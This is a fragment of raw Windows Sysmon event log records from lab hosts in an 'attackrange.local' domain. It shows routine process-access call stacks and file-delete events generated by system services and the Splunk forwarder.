08:02:53.533{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052827Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:53.533{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052826Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:53.533{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052825Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:53.533{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052824Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:53.533{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F72D-60EB-C07D-00000000CF01}8876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052823Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:53.533{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F72D-60EB-C07D-00000000CF01}8876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052822Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:53.518{466BC892-F72D-60EB-C07D-00000000CF01}8876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001052821Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:53.064{466BC892-F72C-60EB-BF7D-00000000CF01}55848044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052909Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.816{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1BC16143042E57D39B1FA663FAC80B7,SHA256=745519FB57C007BEBF1A503326ED01CBDEAAFEF946B60E97E5C7152990F523BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809494Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:54.517{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=665BF8568797018AF3B42B143F9FF133,SHA256=807060B9D1BF0C0401502CDD3B6786A4E4ABDA59A41789F613FC0EC77BFCBC4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052908Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.198{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85875769EE3A3F900BBB463BA1F357CD,SHA256=844DFBB805C8979202D292F0C7581F9A88E235410B01E48D5C2326D354D186F7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052907Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052906Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052905Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052904Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052903Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052902Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052901Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052900Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052899Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052898Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052897Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052896Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052895Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052894Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052893Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052892Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052891Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052890Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052889Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052888Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052887Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052886Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 